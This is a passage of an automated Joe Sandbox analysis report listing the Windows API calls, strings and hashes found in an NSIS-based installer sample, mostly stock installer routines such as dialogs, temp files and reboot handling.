                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                      • String ID:
                                                                      • API String ID: 184305955-0
                                                                      • Opcode ID: e0d780eba1b088fa93d6fd4ed72d6ff884873a26146dcd9c5e819f50ed4c5972
                                                                      • Instruction ID: b507ef7cb9582abf258fe264cbdb2372651992ce94f69c67437d7eaacc5d437d
                                                                      • Opcode Fuzzy Hash: e0d780eba1b088fa93d6fd4ed72d6ff884873a26146dcd9c5e819f50ed4c5972
                                                                      • Instruction Fuzzy Hash: 09C1B0B1500204AFDB216F25EE85E2B7AB9EB8630AF00853EF741B11F1CB3D59529B5D
                                                                      APIs
                                                                        • Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                        • Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                      • lstrcatA.KERNEL32(007AA000,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,75573410,007AA400,007A9000), ref: 00403885
                                                                      • lstrlenA.KERNEL32(007A1EE0,007A9400,?,?,007A1EE0,00000000,007A9400,007AA000,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,75573410), ref: 004038FA
                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
                                                                      • GetFileAttributesA.KERNEL32(007A1EE0), ref: 00403918
                                                                      • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,007A9400), ref: 00403961
                                                                        • Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58
                                                                      • RegisterClassA.USER32(007A26E0), ref: 0040399E
                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039B6
                                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039EB
                                                                      • ShowWindow.USER32(00000005), ref: 00403A21
                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,007A26E0), ref: 00403A4D
                                                                      • GetClassInfoA.USER32(00000000,RichEdit,007A26E0), ref: 00403A5A
                                                                      • RegisterClassA.USER32(007A26E0), ref: 00403A63
                                                                      • DialogBoxParamA.USER32(?,00000000,00403BA7,00000000), ref: 00403A82
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$&z
                                                                      • API String ID: 1975747703-471597453
                                                                      • Opcode ID: 6a61cbbd4cf0e9c1d01e5c8b3980943b7258060f4ff29637f7b3df1c92db6b4f
                                                                      • Instruction ID: 79248491ef2bc55f5e0c4717b820805706146ebb855d4f379394f0877404e8f0
                                                                      • Opcode Fuzzy Hash: 6a61cbbd4cf0e9c1d01e5c8b3980943b7258060f4ff29637f7b3df1c92db6b4f
                                                                      • Instruction Fuzzy Hash: 6C61C6B0240640BED610AF659D45F3B3A6CD785749F10813FF985B62E2DB7D9D028B2D
                                                                      APIs
                                                                      • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404271
                                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 00404285
                                                                      • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004042A3
                                                                      • GetSysColor.USER32(?), ref: 004042B4
                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004042C3
                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004042D2
                                                                      • lstrlenA.KERNEL32(?), ref: 004042D5
                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042E4
                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042F9
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040435B
                                                                      • SendMessageA.USER32(00000000), ref: 0040435E
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404389
                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004043C9
                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 004043D8
                                                                      • SetCursor.USER32(00000000), ref: 004043E1
                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004043F7
                                                                      • SetCursor.USER32(00000000), ref: 004043FA
                                                                      • SendMessageA.USER32(00000111,?,00000000), ref: 00404426
                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040443A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                      • String ID: N
                                                                      • API String ID: 3103080414-1130791706
                                                                      • Opcode ID: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
                                                                      • Instruction ID: a3db5b80d5f6c8d56f7a184239f37e003a0a90a84a660de175ffc46cbe068f47
                                                                      • Opcode Fuzzy Hash: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
                                                                      • Instruction Fuzzy Hash: D361B5B1A40204BFEF109F60DD45F6A7B69FB84704F10802AFB05BA1D1C7B8A951CF99
                                                                      APIs
                                                                      • GetTempPathA.KERNEL32(00000400,007AA400,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403453
                                                                      • GetWindowsDirectoryA.KERNEL32(007AA400,000003FB,?,?,00000160), ref: 00403464
                                                                      • lstrcatA.KERNEL32(007AA400,\Temp,?,?,00000160), ref: 00403470
                                                                      • GetTempPathA.KERNEL32(000003FC,007AA400,007AA400,\Temp,?,?,00000160), ref: 00403484
                                                                      • lstrcatA.KERNEL32(007AA400,Low,?,?,00000160), ref: 0040348C
                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,007AA400,007AA400,Low,?,?,00000160), ref: 0040349D
                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,007AA400,?,?,00000160), ref: 004034A5
                                                                      • DeleteFileA.KERNEL32(007AA000,?,00000006,00000008,0000000A), ref: 004034B9
                                                                        • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                      • OleUninitialize.OLE32(?,?,?,00000160), ref: 00403567
                                                                      • ExitProcess.KERNEL32 ref: 00403588
                                                                      • lstrcatA.KERNEL32(007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 0040359B
                                                                      • lstrcatA.KERNEL32(007AA400,0040A14C,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035AA
                                                                      • lstrcatA.KERNEL32(007AA400,.tmp,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035B5
                                                                      • lstrcmpiA.KERNEL32(007AA400,007A9C00), ref: 004035C1
                                                                      • SetCurrentDirectoryA.KERNEL32(007AA400,007AA400,?,?,?,?,00000160), ref: 004035DD
                                                                      • DeleteFileA.KERNEL32(0079E108,0079E108,?,007A4000,?,?,?,?,?,00000160), ref: 00403636
                                                                      • CopyFileA.KERNEL32(007AAC00,0079E108,?), ref: 0040364A
                                                                      • CloseHandle.KERNEL32(00000000,0079E108,0079E108,?,0079E108,?,?,?,?,?,00000160), ref: 00403677
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,00000160), ref: 004036A5
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004036AC
                                                                      • LookupPrivilegeValueA.ADVAPI32(?,SeShutdownPrivilege,?), ref: 004036C4
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,?,?,?,?,?,SeShutdownPrivilege,?), ref: 004036E3
                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403707
                                                                      • ExitProcess.KERNEL32 ref: 0040372A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcat$Process$ExitFile$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableWindows$AdjustCloseCopyHandleLookupOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrcpyn
                                                                      • String ID: $"$Error launching installer$Low$TEMP$TMP$Vx+$\Temp$`KXu
                                                                      • API String ID: 109303428-969970912
                                                                      • Opcode ID: 47daceb2ab4096686ecc9a2b31aec42577ef1639cad44f253f4325b14c3c5fae
                                                                      • Instruction ID: ee86094215728b75d9dae95d605afab31ae71dc2a4c79600e913a2246e4d607c
                                                                      • Opcode Fuzzy Hash: 47daceb2ab4096686ecc9a2b31aec42577ef1639cad44f253f4325b14c3c5fae
                                                                      • Instruction Fuzzy Hash: 9451033050879069E7256F354D9962F7FE9ABC2306F08447FE4927A2E2CA7C4A04C72F
                                                                      APIs
                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextA.USER32(00000000,007A2740,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F
                                                                      • API String ID: 941294808-1304234792
                                                                      • Opcode ID: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
                                                                      • Instruction ID: 1ef7ef1d3183d2fe833be2fdc16277d02f602c466de40d92ea6efb336f18bcfe
                                                                      • Opcode Fuzzy Hash: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
                                                                      • Instruction Fuzzy Hash: 53417C71400249AFCB058FA5DE459BF7BB9FF45314F00802EF9A1AA1A0C778DA55DFA4
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorModeVersionlstrlen
                                                                      • String ID: $NSIS Error$UXTHEME
                                                                      • API String ID: 758611499-3141987311
                                                                      • Opcode ID: 5462c7cef10a1cbdaf0d8c8109fbba7c3d0b3e9ceb939e16fe40e67dfc00e37f
                                                                      • Instruction ID: 2a398feea240def2510372ba555c9adfae5b6ad84a20a3a993315f833025e39d
                                                                      • Opcode Fuzzy Hash: 5462c7cef10a1cbdaf0d8c8109fbba7c3d0b3e9ceb939e16fe40e67dfc00e37f
                                                                      • Instruction Fuzzy Hash: C731A3B0404341BFE7216F709E09B1B3EA8AB46309F00457EF9C5B62D2DB7C49098B6E
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000,00000000,?,?,00405DED,?,?), ref: 00405C8D
                                                                      • GetShortPathNameA.KERNEL32(?,007A12D8,00000400), ref: 00405C96
                                                                        • Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                                        • Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405B2D
                                                                      • GetShortPathNameA.KERNEL32(?,007A16D8,00000400), ref: 00405CB3
                                                                      • wsprintfA.USER32 ref: 00405CD1
                                                                      • GetFileSize.KERNEL32(00000000,00000000,007A16D8,C0000000,00000004,007A16D8,?), ref: 00405D0C
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D1B
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D53
                                                                      • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,007A0ED8,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405DA9
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405DBA
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405DC1
                                                                        • Part of subcall function 00405B86: GetFileAttributesA.KERNEL32(00000003,00402E04,007AAC00,80000000,00000003), ref: 00405B8A
                                                                        • Part of subcall function 00405B86: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405BAC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                      • String ID: %s=%s$[Rename]
                                                                      • API String ID: 2171350718-1727408572
                                                                      • Opcode ID: d25c713501a9bf653a1fcacbbfc2014aaa95160241b761f08358092e952fb18f
                                                                      • Instruction ID: 4ef5f1c50d251b73862b961a89edc9b2cc60572935cd21a4370a6936b8511f12
                                                                      • Opcode Fuzzy Hash: d25c713501a9bf653a1fcacbbfc2014aaa95160241b761f08358092e952fb18f
                                                                      • Instruction Fuzzy Hash: 5231F231201B15ABD2206B659D4DF6B3A6CDF86754F14053FFA01F62D2EA3CE8058EAD
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040455C
                                                                      • SetWindowTextA.USER32(00000000,?), ref: 00404586
                                                                      • SHBrowseForFolderA.SHELL32(?,0079E920,?), ref: 00404637
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404642
                                                                      • lstrcmpiA.KERNEL32(007A1EE0,0079F548), ref: 00404674
                                                                      • lstrcatA.KERNEL32(?,007A1EE0), ref: 00404680
                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404692
                                                                        • Part of subcall function 004056ED: GetDlgItemTextA.USER32(?,?,00000400,004046C9), ref: 00405700
                                                                        • Part of subcall function 00406257: CharNextA.USER32(?,*?|<>/":,00000000,007A9000,75573410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
                                                                        • Part of subcall function 00406257: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
                                                                        • Part of subcall function 00406257: CharNextA.USER32(?,007A9000,75573410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
                                                                        • Part of subcall function 00406257: CharPrevA.USER32(?,?,75573410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062D1
                                                                      • GetDiskFreeSpaceA.KERNEL32(0079E518,?,?,0000040F,?,0079E518,0079E518,?,?,0079E518,?,?,000003FB,?), ref: 00404750
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040476B
                                                                        • Part of subcall function 004048C4: lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
                                                                        • Part of subcall function 004048C4: wsprintfA.USER32 ref: 0040496A
                                                                        • Part of subcall function 004048C4: SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: A
                                                                      • API String ID: 2624150263-3554254475
                                                                      • Opcode ID: 67040a0a49a64ce828be965077cda0b708920273d8bfda1b546e689113884970
                                                                      • Instruction ID: c53a8e09cffb511e2e8442f8e0ee4109053d5ca2156788ad792cf5210b9728ca
                                                                      • Opcode Fuzzy Hash: 67040a0a49a64ce828be965077cda0b708920273d8bfda1b546e689113884970
                                                                      • Instruction Fuzzy Hash: F4A17FB1900209ABDB11AFA5CD45AAFB7B8EF85314F14843BF601B62D1D77C8A418F69
                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32(007A1EE0,00000400), ref: 0040613A
                                                                      • GetWindowsDirectoryA.KERNEL32(007A1EE0,00000400,?,0079ED28,00000000,0040514C,0079ED28,?), ref: 0040614D
                                                                      • SHGetSpecialFolderLocation.SHELL32(LQ@(y,?,?,0079ED28,00000000,0040514C,0079ED28,?), ref: 00406189
                                                                      • SHGetPathFromIDListA.SHELL32(?,007A1EE0), ref: 00406197
                                                                      • CoTaskMemFree.OLE32(?), ref: 004061A3
                                                                      • lstrcatA.KERNEL32(007A1EE0,\Microsoft\Internet Explorer\Quick Launch), ref: 004061C7
                                                                      • lstrlenA.KERNEL32(007A1EE0,?,0079ED28,00000000,0040514C,0079ED28,?), ref: 00406219
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                      • String ID: .$LQ@(y$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 717251189-3515046496
                                                                      • Opcode ID: 355b90f3f401d120c3d4b6cf139cfaaf503aaee0dfbae073ec691654466f74a4
                                                                      • Instruction ID: d98bd44868bde6ace230f91b8fcf6596fc401970515ead307cdfb18f28ae641c
                                                                      • Opcode Fuzzy Hash: 355b90f3f401d120c3d4b6cf139cfaaf503aaee0dfbae073ec691654466f74a4
                                                                      • Instruction Fuzzy Hash: EE61F471904111AEDF11AF68CC84B7E3BA49B56314F16817FE903BA2D2C73C49A2CB4E
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(0079ED28), ref: 0040514D
                                                                      • lstrlenA.KERNEL32(?,0079ED28), ref: 0040515D
                                                                      • lstrcatA.KERNEL32(0079ED28,?,?,0079ED28), ref: 00405170
                                                                      • SetWindowTextA.USER32(0079ED28,0079ED28), ref: 00405182
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID: (y
                                                                      • API String ID: 2531174081-255812342
                                                                      • Opcode ID: 95f89131369c21242812949e714cdf1864596966d358f4f3b94d925066a10f3f
                                                                      • Instruction ID: bffe320471bb4ed621b5b80758aa42b14eae6e2fc0b22327473978c148379bdd
                                                                      • Opcode Fuzzy Hash: 95f89131369c21242812949e714cdf1864596966d358f4f3b94d925066a10f3f
                                                                      • Instruction Fuzzy Hash: 06219D71D00518BBDF119FA9CD80ADEBFB9EF05358F10807AF904B6291C6388E418FA8
                                                                      APIs
                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 004040FF
                                                                      • GetSysColor.USER32(00000000), ref: 0040413D
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404149
                                                                      • SetBkMode.GDI32(?,?), ref: 00404155
                                                                      • GetSysColor.USER32(?), ref: 00404168
                                                                      • SetBkColor.GDI32(?,?), ref: 00404178
                                                                      • DeleteObject.GDI32(?), ref: 00404192
                                                                      • CreateBrushIndirect.GDI32(?), ref: 0040419C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                      • Instruction ID: 7e7a0635a9a9ad053635d0a61e184563e53fd5caf941e55c08cb8fd0a55be6c0
                                                                      • Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                      • Instruction Fuzzy Hash: 312195715007049BD7309F68DD0CB5BBBF4AF91710B048A2EEA96A62E4C738D894CB54
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00402F73
                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,000000FF,00000000,00000000,?,?), ref: 00402FD9
                                                                        • Part of subcall function 00402D60: DestroyWindow.USER32(?,00000000,00402F3E,?), ref: 00402D73
                                                                      Strings
                                                                      • Null, xrefs: 00402EBB
                                                                      • Inst, xrefs: 00402EA9
                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
                                                                      • soft, xrefs: 00402EB2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: AllocDestroyFileGlobalPointerWindow
                                                                      • String ID: Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                      • API String ID: 1580554587-639894862
                                                                      • Opcode ID: aa602fcc84524977c216627ed963f5b7eedb9863e13b54dad4ba2881f4455998
                                                                      • Instruction ID: a92ccb9d8f619cb80c5c611e8c8ba1d2dc739ca40880e943336e7b39007ee354
                                                                      • Opcode Fuzzy Hash: aa602fcc84524977c216627ed963f5b7eedb9863e13b54dad4ba2881f4455998
                                                                      • Instruction Fuzzy Hash: 7E41C731900216AFDF109F64DA89B9E7B74EB54395F10403BE904B62D1C6BC9E81AB5D
